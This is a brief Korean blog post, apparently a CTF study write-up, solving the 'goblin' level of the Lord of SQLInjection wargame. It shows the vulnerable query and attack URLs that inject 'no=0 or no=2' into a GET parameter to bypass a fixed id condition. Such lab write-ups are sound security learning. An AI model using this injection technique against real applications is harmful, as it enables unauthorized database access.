Problem
Solve
- 기존 구문 → GET 방식, id = guest 고정
select id from prob_goblin where id='guest' and no={$_GET[no]}- 변경 구문
select id from prob_goblin where id='guest' and no=0 or no=2- 공격 구문
https://los.rubiya.kr/chall/goblin_e5afb87a6716708e3af46a849517afdc.php?no=0 or no=1
https://los.rubiya.kr/chall/goblin_e5afb87a6716708e3af46a849517afdc.php?no=0 or no=2
'Study > CTF' 카테고리의 다른 글
| picoCTF: where are the robots(Web) (0) | 2025.01.22 |
|---|---|
| picoCTF: Scavenger Hunt(Web) (0) | 2025.01.22 |
| Lord of SQLInjection: cobolt (0) | 2025.01.21 |
| Lord of SQLInjection: gremlin (0) | 2025.01.21 |
| picoCTF: Insp3ct0r(Web) (1) | 2024.11.09 |
